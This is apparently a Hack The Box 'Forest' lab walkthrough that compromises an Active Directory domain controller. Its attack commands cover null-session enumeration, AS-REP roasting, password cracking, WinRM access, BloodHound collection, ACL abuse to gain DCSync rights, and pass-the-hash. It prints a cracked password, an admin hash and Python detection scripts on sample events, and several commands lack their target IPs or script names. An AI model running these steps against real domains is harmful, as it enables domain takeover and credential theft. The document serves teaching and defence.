HTB - Forest Writeup -


This machine is rated easy difficulty. Getting user involved a service account with Kerberos pre-authentication disabled: its AS-REP hash was requested with the Impacket script GetNPUsers and cracked offline. Root required using BloodHound to visualise the AD environment and find a path to Domain Admin, which included abusing ACLs to obtain DCSync rights.

1. Recon

As usual we will start with an nmap scan of the target machine:
nmap -sC -sV -oA nmap/scan
The ports of note here are:

  • 445 - SMB
  • 88 - Kerberos
  • 135 - RPC
  • 5985 - WinRM (PowerShell remoting over WS-Management)

Knowing that RPC is open we can try a null session to get a list of user accounts:
rpcclient -U "" -N enumdomusers

  • One account is of particular interest as it starts with svc, which indicates it may be a service account; such accounts often carry extra permissions relating to local groups and users that can be abused
  • We can attempt to AS-REP roast this user to try and get a hash we can crack

2. Exploitation to User

Clone the Impacket repo and navigate into the examples folder.

Now try attacking the svc-alfresco account:

  • If you remember from the nmap scan the domain was htb.local:
    ./ htb.local/svc-alfresco -format john -dc-ip
    Bingo! We now have the AS-REP hash of the user svc-alfresco and we can crack it using John the Ripper
    1. First place the hash in a file called hash.txt
    2. Run john -w=/usr/share/wordlists/rockyou.txt hash.txt
  • We now have the password of the user svc-alfresco - s3rvice
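As an added defensive aside (this is not part of the original write-up and not Impacket code), the script below shows what the step above looks like from the blue-team side: which accounts have the DONT_REQUIRE_PREAUTH bit set in userAccountControl, and which Kerberos TGT requests (Security event 4768) carry the no-pre-auth plus RC4 footprint that roasting tools leave. The user records and event records are constructed samples whose field names follow the Windows Security log; the IP addresses are made up.

```python
# Added example (not from the write-up): the AS-REP roasting step seen from
# the defender's side. Two checks on the same weakness:
#   1. Configuration: which accounts carry the DONT_REQUIRE_PREAUTH bit
#      (0x400000) in userAccountControl, i.e. which accounts can be roasted.
#   2. Telemetry: Kerberos TGT requests (Security event 4768) issued without
#      pre-authentication (PreAuthType 0) and with RC4 (etype 0x17) are the
#      usual footprint of AS-REP roasting tools.
# All records below are constructed sample data, not real directory or log data.

DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl bit ADS_UF_DONT_REQUIRE_PREAUTH
NORMAL_ACCOUNT = 0x200
DONT_EXPIRE_PASSWORD = 0x10000
RC4_HMAC = 0x17                   # Kerberos etype 23; crackable offline, so roasting tools ask for it


def accounts_without_preauth(users):
    """sAMAccountNames whose userAccountControl has DONT_REQUIRE_PREAUTH set."""
    return sorted(
        u["sAMAccountName"] for u in users
        if u["userAccountControl"] & DONT_REQUIRE_PREAUTH
    )


def is_asrep_roast_event(event):
    """True for a successful 4768 whose TGT was issued with no pre-auth and RC4.

    A legitimately pre-auth-disabled account also produces this on every
    logon, so treat a hit as something to triage rather than proof of attack.
    """
    return (
        event["EventID"] == 4768
        and event["Status"] == 0x0            # KDC returned a ticket
        and event["PreAuthType"] == 0         # "logon without pre-authentication"
        and event["TicketEncryptionType"] == RC4_HMAC
    )


def flag_asrep_roasting(events):
    """(account, client IP) pairs from events matching the AS-REP roast pattern."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events if is_asrep_roast_event(e)]


# Constructed directory records; only svc-alfresco has pre-auth disabled.
SAMPLE_USERS = [
    {"sAMAccountName": "svc-alfresco",
     "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "andy", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "lucinda", "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD},
]

# Constructed 4768 records with the fields the Security log exposes.
SAMPLE_EVENTS = [
    # the roast: no pre-auth, RC4, ticket issued
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "PreAuthType": 0,
     "TicketEncryptionType": 0x17, "Status": 0x0, "IpAddress": "10.10.14.5"},
    # normal logon: timestamp pre-auth (type 2) and AES256 (etype 0x12)
    {"EventID": 4768, "TargetUserName": "andy", "PreAuthType": 2,
     "TicketEncryptionType": 0x12, "Status": 0x0, "IpAddress": "10.10.10.50"},
    # request for a non-existent user: KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6), no ticket
    {"EventID": 4768, "TargetUserName": "backup", "PreAuthType": 0,
     "TicketEncryptionType": 0xFFFFFFFF, "Status": 0x6, "IpAddress": "10.10.14.5"},
]

if __name__ == "__main__":
    print("pre-auth disabled:", accounts_without_preauth(SAMPLE_USERS))
    print("AS-REP roast candidates:", flag_asrep_roasting(SAMPLE_EVENTS))
```

The configuration check is the fix: clearing the flag (or, where a legacy application really needs it, giving the account a long random password and an AES-only policy) removes the hash an attacker could crack. The event check is the detection: a burst of 4768s with PreAuthType 0 and RC4 from one client IP, especially mixed with 0x6 status failures for unknown names, is worth an alert.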

Now we can log in to the PowerShell remote management port using a tool called Evil-WinRM:
evil-winrm -i -u svc-alfresco -p s3rvice

Now that we have a shell we can also grab user.txt.

3. Priv Esc from User to Domain Admin

  • For this priv esc we will use a tool called BloodHound to visualise the Active Directory environment - follow the BloodHound Wiki guide on how to set it up on your system

To begin we need to initialize the neo4j database, which you can do by running:
neo4j console

Now that the db has been launched we can launch BloodHound by running bloodhound in a terminal.

Now that BloodHound is running we need some data to analyze. We can use SharpHound.exe together with the upload and download capabilities of Evil-WinRM to get the files. Open a new terminal and download SharpHound.exe from GitHub.

Now in your Evil-WinRM terminal type:
upload SharpHound.exe

Now we can run the file with the -c All flag to specify we want to collect all data on the AD environment:
.\SharpHound.exe -c All

Run ls to find the zip file SharpHound produced, then fetch it with Evil-WinRM's download command.

We now have the BloodHound zip file on our local machine, so we can open it in BloodHound by dragging it into the window.

  • You should now see that we have a lot of data in our database

Now we can run one of the pre-made queries, Shortest Paths to Unconstrained Delegation Systems. There are a few things that we can see now:

  • We are part of the privileged IT group and as a result a member of Account Operators, which can add members to the Exchange Windows Permissions and Exchange Trusted Subsystem groups
  • Firstly, this means that we can add ourselves to Exchange Windows Permissions and Exchange Trusted Subsystem
  • This also means we can abuse the ACL (Access Control List) on the domain object to allow svc-alfresco to perform a DCSync attack and get the admin hash; there is a good video that explains this

Let's try adding ourselves to the first group:
net group "Exchange Windows Permissions" svc-alfresco /add

We can also add ourselves to the Exchange Trusted Subsystem group, which will allow us to abuse the ACL:
Add-ADGroupMember -Identity "Exchange Trusted Subsystem" -Members svc-alfresco

We can now use a tool called aclpwn to give svc-alfresco DCSync rights. The ACLPWN Blog article describes its usage very well.

  1. Let's install aclpwn in Kali; it's as simple as pip install aclpwn

  2. Let's execute this command to give us DCSync permissions, and choose option 1:
     aclpwn -f svc-alfresco -ft user -d htb.local -s

  3. Now we can use Impacket's script to get the admin hash:
     htb.local/svc-alfresco:s3rvice@htb.local -dc-ip

Bingo! We now have the admin hash.
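For the defensive view of the escalation chain above (added here, not part of the original write-up and not aclpwn or Impacket code), the script below checks the two domain-controller events that expose it: membership additions to groups that control the domain object (4728/4732/4756 for global/local/universal groups) and use of the directory replication control-access rights in 4662, which is what a DCSync request looks like in the Security log. The replication-right GUIDs are the fixed schema values; the sensitive-group list and the "DC01$" computer account are assumptions for illustration, and every event is a constructed sample.

```python
# Added example (not from the write-up): the two domain-controller events that
# expose the escalation chain above. Group membership changes to groups that
# control the domain object (4728/4732/4756, global/local/universal) and use of
# the directory replication control-access rights (4662), which is what DCSync
# looks like on the wire. The replication-right GUIDs are fixed in the schema;
# the group list is an assumption for this domain; the events are constructed.
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
CONTROL_ACCESS = 0x100   # ADS_RIGHT_DS_CONTROL_ACCESS bit in the 4662 AccessMask
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Groups whose membership should never change without a change ticket. The two
# Exchange groups are the ones abused in the write-up. (Assumed list.)
SENSITIVE_GROUPS = {
    "Exchange Windows Permissions", "Exchange Trusted Subsystem",
    "Account Operators", "Domain Admins", "Enterprise Admins", "Administrators",
}
MEMBER_ADD_EVENTS = {4728, 4732, 4756}


def flag_sensitive_group_adds(events):
    """(actor, new member, group) for additions to a sensitive group."""
    return [
        (e["SubjectUserName"], e["MemberName"], e["TargetUserName"])
        for e in events
        if e["EventID"] in MEMBER_ADD_EVENTS and e["TargetUserName"] in SENSITIVE_GROUPS
    ]


def replication_rights_used(event):
    """Names of replication rights referenced in a 4662's Properties field."""
    if event["EventID"] != 4662 or not (event["AccessMask"] & CONTROL_ACCESS):
        return []
    guids = {g.lower() for g in GUID_RE.findall(event["Properties"])}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def flag_dcsync(events, allowed_principals=()):
    """(subject, rights) for replication requests by anything other than a DC.

    Domain controller computer accounts (names ending in '$') replicate all
    day; an explicit allowlist covers services that legitimately replicate.
    """
    hits = []
    for e in events:
        rights = replication_rights_used(e)
        subject = e.get("SubjectUserName", "")
        if rights and not subject.endswith("$") and subject not in allowed_principals:
            hits.append((subject, rights))
    return hits


# Constructed sample events in the shape of the Security log fields.
SAMPLE_EVENTS = [
    # the write-up's first step: a user adds itself to an Exchange group
    {"EventID": 4756, "SubjectUserName": "svc-alfresco", "MemberName": "svc-alfresco",
     "TargetUserName": "Exchange Windows Permissions"},
    # routine change to an ordinary group
    {"EventID": 4756, "SubjectUserName": "andy", "MemberName": "lucinda",
     "TargetUserName": "Marketing"},
    # DCSync: a user account exercising both replication rights on the domain
    {"EventID": 4662, "SubjectUserName": "svc-alfresco", "ObjectType": "domainDNS",
     "AccessMask": 0x100,
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # normal replication by a domain controller (constructed name DC01$)
    {"EventID": 4662, "SubjectUserName": "DC01$", "ObjectType": "domainDNS",
     "AccessMask": 0x100,
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    # unrelated property write; placeholder GUID, not a replication right
    {"EventID": 4662, "SubjectUserName": "andy", "ObjectType": "user",
     "AccessMask": 0x20,
     "Properties": "%%7688\n{00000000-0000-0000-0000-000000000000}"},
]

if __name__ == "__main__":
    print("sensitive group adds:", flag_sensitive_group_adds(SAMPLE_EVENTS))
    print("DCSync candidates:", flag_dcsync(SAMPLE_EVENTS))
```

Both checks depend on the "Audit Directory Service Access" and "Audit Security Group Management" subcategories being enabled on the domain controllers, and 4662 only fires for the replication rights if the domain object's SACL audits control access. The broader fix is the one BloodHound makes visible: Account Operators should not be able to reach a group that holds WriteDacl on the domain, so those Exchange groups need their membership and their rights on the domain object trimmed.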

We can use this to log on using Evil-WinRM with the -H flag (pass-the-hash) and grab root.txt:
evil-winrm -i -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6


If you enjoyed my write up or found it useful check out my htb profile linked below: